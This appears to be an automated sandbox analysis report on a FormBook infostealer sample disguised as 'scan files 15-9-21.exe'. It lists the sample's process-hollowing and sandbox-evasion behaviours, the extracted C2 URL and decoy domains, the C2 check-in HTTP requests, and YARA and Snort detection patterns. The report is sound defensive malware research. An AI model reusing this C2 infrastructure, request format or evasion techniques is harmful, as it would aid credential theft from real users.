Loading ...

Play interactive tourEdit tour

Windows Analysis Report scan files 15-9-21.exe

Overview

General Information

Sample Name:scan files 15-9-21.exe
Analysis ID:483582
MD5:00e32d8a2cbd54e967bfc8f512086ecf
SHA1:f51b70a2117089a87b0daf6f179a3b492acf58f2
SHA256:36d409b61a0f456cb3e593338ebf2db1fae38ea645392d98030bc7e7a0eb9a3c
Tags:exeFormbookxloader
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • scan files 15-9-21.exe (PID: 6752 cmdline: 'C:\Users\user\Desktop\scan files 15-9-21.exe' MD5: 00E32D8A2CBD54E967BFC8F512086ECF)
    • scan files 15-9-21.exe (PID: 6920 cmdline: C:\Users\user\Desktop\scan files 15-9-21.exe MD5: 00E32D8A2CBD54E967BFC8F512086ECF)
      • explorer.exe (PID: 3292 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • WWAHost.exe (PID: 4068 cmdline: C:\Windows\SysWOW64\WWAHost.exe MD5: 370C260333EB3149EF4E49C8F64652A0)
          • cmd.exe (PID: 5336 cmdline: /c del 'C:\Users\user\Desktop\scan files 15-9-21.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.lifewithbriana.com/mej0/"], "decoy": ["mtxs8.com", "quickskiplondon.com", "sltplanner.com", "generatedate.com", "amsinspections.com", "tomrings.com", "109friends.com", "freelovereading.com", "avalapartners.com", "nordiqueluxury.com", "inmbex.com", "everybankatm.com", "bo1899.com", "ashymeadow.com", "pubgm-chickendinner.com", "takudolunch.com", "carlagremiao.com", "actonetheatre.com", "wemhealth.com", "khasomat.net", "lartiqueusa.com", "singularity.institute", "ashsgx567d.com", "sequoiaparts.net", "ujriksalead.com", "ag99.xyz", "isabeltimon.com", "bijyo-topic.site", "homefuels.energy", "2ofakinddesigns.com", "iggglobal.com", "ravenlightproductions.com", "magicaltransform.com", "2936vaquero.com", "essentialme.network", "thebrathouse.info", "tecstrong.net", "ayulaksmi.com", "maximebazerque.com", "bankdj.com", "pizzaoff.com", "eastcohemp.com", "acordolimpo.com", "mediacpstreamchile.com", "wholesalefleuerdelis.com", "chuangyuanfz.com", "getcenteredwithclay.com", "retaboo.com", "ikonicboatcharters.com", "parakhonskiy.com", "tropical-therapy.com", "metropitstop.com", "municipiodeanton.net", "valorplanodesaudemaranhao.info", "alibabakanaat.com", "creditsoptionsnow.com", "arabgerman.digital", "webspazio.com", "sunsyncindia.com", "jlsolutionspty.com", "almightyamerican.com", "nadirshirts.com", "gdxinmu.com", "postcaremedical.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.342717924.00000000015D0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.342717924.00000000015D0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.342717924.00000000015D0000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000002.340222255.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000002.340222255.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 24 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.scan files 15-9-21.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.scan files 15-9-21.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.scan files 15-9-21.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        2.2.scan files 15-9-21.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.scan files 15-9-21.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000002.00000002.342717924.00000000015D0000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.lifewithbriana.com/mej0/"], "decoy": ["mtxs8.com", "quickskiplondon.com", "sltplanner.com", "generatedate.com", "amsinspections.com", "tomrings.com", "109friends.com", "freelovereading.com", "avalapartners.com", "nordiqueluxury.com", "inmbex.com", "everybankatm.com", "bo1899.com", "ashymeadow.com", "pubgm-chickendinner.com", "takudolunch.com", "carlagremiao.com", "actonetheatre.com", "wemhealth.com", "khasomat.net", "lartiqueusa.com", "singularity.institute", "ashsgx567d.com", "sequoiaparts.net", "ujriksalead.com", "ag99.xyz", "isabeltimon.com", "bijyo-topic.site", "homefuels.energy", "2ofakinddesigns.com", "iggglobal.com", "ravenlightproductions.com", "magicaltransform.com", "2936vaquero.com", "essentialme.network", "thebrathouse.info", "tecstrong.net", "ayulaksmi.com", "maximebazerque.com", "bankdj.com", "pizzaoff.com", "eastcohemp.com", "acordolimpo.com", "mediacpstreamchile.com", "wholesalefleuerdelis.com", "chuangyuanfz.com", "getcenteredwithclay.com", "retaboo.com", "ikonicboatcharters.com", "parakhonskiy.com", "tropical-therapy.com", "metropitstop.com", "municipiodeanton.net", "valorplanodesaudemaranhao.info", "alibabakanaat.com", "creditsoptionsnow.com", "arabgerman.digital", "webspazio.com", "sunsyncindia.com", "jlsolutionspty.com", "almightyamerican.com", "nadirshirts.com", "gdxinmu.com", "postcaremedical.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: scan files 15-9-21.exeVirustotal: Detection: 29%Perma Link
          Source: scan files 15-9-21.exeReversingLabs: Detection: 26%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.scan files 15-9-21.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.scan files 15-9-21.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.342717924.00000000015D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.340222255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.296739231.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.316398859.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.520331838.0000000000870000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.342785187.0000000001600000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.520884940.0000000000A80000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.521187644.0000000000B00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.262326263.0000000003979000.00000004.00000001.sdmp, type: MEMORY
          Machine Learning detection for sampleShow sources
          Source: scan files 15-9-21.exeJoe Sandbox ML: detected
          Source: 2.2.scan files 15-9-21.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: scan files 15-9-21.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: scan files 15-9-21.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: WWAHost.pdb source: scan files 15-9-21.exe, 00000002.00000003.335101550.0000000003940000.00000004.00000001.sdmp
          Source: Binary string: WWAHost.pdbUGP source: scan files 15-9-21.exe, 00000002.00000003.335101550.0000000003940000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: scan files 15-9-21.exe, 00000002.00000002.343119287.0000000001AC0000.00000040.00000001.sdmp, WWAHost.exe, 0000000D.00000002.525382273.0000000003640000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: scan files 15-9-21.exe, 00000002.00000002.343119287.0000000001AC0000.00000040.00000001.sdmp, WWAHost.exe
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49777 -> 34.98.99.30:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49777 -> 34.98.99.30:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49777 -> 34.98.99.30:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49779 -> 35.237.65.63:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49779 -> 35.237.65.63:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49779 -> 35.237.65.63:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49785 -> 99.83.154.118:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49785 -> 99.83.154.118:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49785 -> 99.83.154.118:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.valorplanodesaudemaranhao.info
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.196.84 80
          Source: C:\Windows\explorer.exeDomain query: www.everybankatm.com
          Source: C:\Windows\explorer.exeDomain query: www.nordiqueluxury.com
          Source: C:\Windows\explorer.exeDomain query: www.quickskiplondon.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.98.99.30 80
          Source: C:\Windows\explorer.exeDomain query: www.singularity.institute
          Source: C:\Windows\explorer.exeDomain query: www.parakhonskiy.com
          Source: C:\Windows\explorer.exeDomain query: www.lifewithbriana.com
          Source: C:\Windows\explorer.exeNetwork Connect: 35.237.65.63 80
          Source: C:\Windows\explorer.exeNetwork Connect: 84.34.147.60 80
          Source: C:\Windows\explorer.exeDomain query: www.municipiodeanton.net
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.lifewithbriana.com/mej0/
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: TSF-IP-CORETeliaFinlandOyjEU TSF-IP-CORETeliaFinlandOyjEU
          Source: global trafficHTTP traffic detected: GET /mej0/?ZTSpa=l0iLI2tDMbyWX17YzQI3VU6Ovc+Srds2u4QKsmMGezHC91xioYtP6wjZJcIMhpUbXqNeFFgVfw==&vP=JtCxKN HTTP/1.1Host: www.nordiqueluxury.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mej0/?ZTSpa=JBp6XH2M4Q0SiKTdqMGnH1VhHOjyZ1YS2BfWCv8a5VwMthBJctfaCfrdZAs0prUxB4i8ziLjxQ==&vP=JtCxKN HTTP/1.1Host: www.valorplanodesaudemaranhao.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mej0/?ZTSpa=KB5aME/wLlFyZRHVaeByRa16oaYSLG5vTwTmPkRiuCF7mWnEGcyzal0mWpntA1EdT4HAAexMQQ==&vP=JtCxKN HTTP/1.1Host: www.municipiodeanton.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mej0/?ZTSpa=a/1Q0lHImOSlB3OMiE52M5irpU60+rDCM9jGEsCAFmqZfqxrPXb+yY2uJ0P5II+wgFq1rM2W6g==&vP=JtCxKN HTTP/1.1Host: www.quickskiplondon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mej0/?ZTSpa=RzUuUNIP5w6/jz6u/3nPHL71H0tFSqxvyYqd1E+XwjP7nDbVm/SW3vaLh5vwv8/S3nR/rxiqcA==&vP=JtCxKN HTTP/1.1Host: www.singularity.instituteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000003.00000000.270733342.000000000686B000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: unknownDNS traffic detected: queries for: www.parakhonskiy.com
          Source: global trafficHTTP traffic detected: GET /mej0/?ZTSpa=l0iLI2tDMbyWX17YzQI3VU6Ovc+Srds2u4QKsmMGezHC91xioYtP6wjZJcIMhpUbXqNeFFgVfw==&vP=JtCxKN HTTP/1.1Host: www.nordiqueluxury.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mej0/?ZTSpa=JBp6XH2M4Q0SiKTdqMGnH1VhHOjyZ1YS2BfWCv8a5VwMthBJctfaCfrdZAs0prUxB4i8ziLjxQ==&vP=JtCxKN HTTP/1.1Host: www.valorplanodesaudemaranhao.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mej0/?ZTSpa=KB5aME/wLlFyZRHVaeByRa16oaYSLG5vTwTmPkRiuCF7mWnEGcyzal0mWpntA1EdT4HAAexMQQ==&vP=JtCxKN HTTP/1.1Host: www.municipiodeanton.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mej0/?ZTSpa=a/1Q0lHImOSlB3OMiE52M5irpU60+rDCM9jGEsCAFmqZfqxrPXb+yY2uJ0P5II+wgFq1rM2W6g==&vP=JtCxKN HTTP/1.1Host: www.quickskiplondon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mej0/?ZTSpa=RzUuUNIP5w6/jz6u/3nPHL71H0tFSqxvyYqd1E+XwjP7nDbVm/SW3vaLh5vwv8/S3nR/rxiqcA==&vP=JtCxKN HTTP/1.1Host: www.singularity.instituteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.scan files 15-9-21.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.scan files 15-9-21.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.342717924.00000000015D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.340222255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.296739231.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.316398859.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.520331838.0000000000870000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.342785187.0000000001600000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.520884940.0000000000A80000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.521187644.0000000000B00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.262326263.0000000003979000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 2.2.scan files 15-9-21.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.scan files 15-9-21.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.scan files 15-9-21.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.scan files 15-9-21.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.342717924.00000000015D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.342717924.00000000015D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.340222255.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.340222255.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.296739231.000000000E0BC000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.296739231.000000000E0BC000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.316398859.000000000E0BC000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.316398859.000000000E0BC000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.520331838.0000000000870000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.520331838.0000000000870000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.342785187.0000000001600000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.342785187.0000000001600000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.520884940.0000000000A80000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.520884940.0000000000A80000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.521187644.0000000000B00000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.521187644.0000000000B00000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.262326263.0000000003979000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.262326263.0000000003979000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          .NET source code contains very large stringsShow sources
          Source: scan files 15-9-21.exe, Forms/mainForm.csLong String: Length: 38272
          Source: 0.0.scan files 15-9-21.exe.580000.0.unpack, Forms/mainForm.csLong String: Length: 38272
          Source: 0.2.scan files 15-9-21.exe.580000.0.unpack, Forms/mainForm.csLong String: Length: 38272
          Source: 2.2.scan files 15-9-21.exe.fd0000.1.unpack, Forms/mainForm.csLong String: Length: 38272
          Source: 2.0.scan files 15-9-21.exe.fd0000.0.unpack, Forms/mainForm.csLong String: Length: 38272
          Source: scan files 15-9-21.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 2.2.scan files 15-9-21.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.scan files 15-9-21.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.scan files 15-9-21.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.scan files 15-9-21.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.342717924.00000000015D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.342717924.00000000015D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.340222255.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.340222255.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.296739231.000000000E0BC000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.296739231.000000000E0BC000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
